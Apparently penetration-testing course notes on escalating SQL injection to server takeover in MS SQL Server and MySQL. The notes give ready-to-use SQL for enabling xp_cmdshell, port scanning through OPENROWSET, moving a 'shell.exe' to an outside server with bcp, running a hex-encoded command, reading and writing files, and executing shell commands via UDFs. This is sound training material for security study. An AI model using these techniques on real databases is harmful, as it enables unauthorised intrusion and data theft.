# 5.4.8 From SQLi to Server Takeover

## From SQLi to Server Takeover

In this section, advanced features provided by MS SQL Server and MySQL are explored, revealing how these features can be exploited to gain access to the DBMS server machine.

### **Advanced SQL Server Exploitation**

#### **xp\_cmdshell:**

* `xp_cmdshell` is a stored procedure in SQL Server that provides advanced features.
* To run an OS command: `EXEC master..xp_cmdshell '<command>'`
* Not enabled by default, requires sa privileges.
*   Enable and disable:

    ```sql
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;

    -- After tests
    EXEC sp_configure 'xp_cmdshell', 0;
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
    ```

### **Internal Network Host Enumeration**

* Use `xp_cmdshell` to launch commands.
* Ping command: `EXEC master.dbo.xp_cmdshell 'ping <target IP address>'`
* Use execution time to infer ping result.

### **Port Scanning (OPENROWSET)**

* Use `OPENROWSET` for remote server table access.
*   Exploit for port scanning:

    ```sql
    SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sas;pwd=something;Network=DBMSSOCN;Address=<target IP>,<target port>;timeout=<connection timeout in seconds>', 'select 1')--
    ```
* Detect open/closed ports based on error messages.

### **Reading the File System**

* Use `EXEC master..xp_cmdshell 'dir <target directory>'` to list directory contents.
* Save output to a web-accessible folder or read a file and put content into a table for extraction.

### **Uploading Files**

*   Insert file into a table in the MS SQL database.

    ```sql
    CREATE TABLE HelperTable (file text)
    BULK INSERT HelperTable FROM 'shell.exe' WITH (codepage='RAW')
    ```
*   Retrieve it from our server:

    ```sql
    EXEC xp_cmdshell 'bcp "SELECT * FROM HelperTable" queryout shell.exe -c -Craw -S<our server address> -I<out server username> -P<our server password>'
    ```

### **Storing Command Results into a Temporary Table**

*   Create a temporary table to hold stored procedure output:

    ```sql
    CREATE TABLE temptable (id int not null identity (1,1), output nvarchar(4096) null);
    ```
* Craft argument for `xp_cmdshell`.
*   Execute command and store results:

    ```sql
    declare @t nvarchar(4096) set @t=0x640069007200200063003a005c00 insert into temptable (output) EXEC master.dbo.xp_cmdshell @t;
    ```

**Conclusion:**

* Advanced SQL Server exploitation involves leveraging features like `xp_cmdshell` for OS command execution, internal network host enumeration, port scanning, reading the file system, uploading and downloading files, and storing command results for further analysis.

## **Advanced MySQL Exploitation**

### **Reading the File System:**

* Use `LOAD_FILE('<text file path>')` to read files.
* For binary files: `SELECT HEX(LOAD_FILE('<text file path>'))`.

### **Uploading Files:**

*   Use `SELECT ... INTO DUMPFILE` to write query results to a file.

    ```sql
    SELECT <fields> FROM <table> INTO DUMPFILE '<output file path>';
    ```
* Convert binary file to hex-string and upload.

### **Executing Shell Commands:**

* MySQL doesn't provide a direct method for running shell commands.
* Use User Defined Functions (UDF) for custom functions like `sys_eval` and `sys_exec`.
* Upload shared objects (SO) or dynamic-link library (DLL) files to the target server.
*   Execute commands:

    ```sql
    SELECT sys_eval('<command>')
    SELECT sys_exec('<command>')
    ```

**Conclusion:**

* Advanced MySQL exploitation includes reading the file system, uploading files, and executing shell commands using User Defined Functions (UDFs).
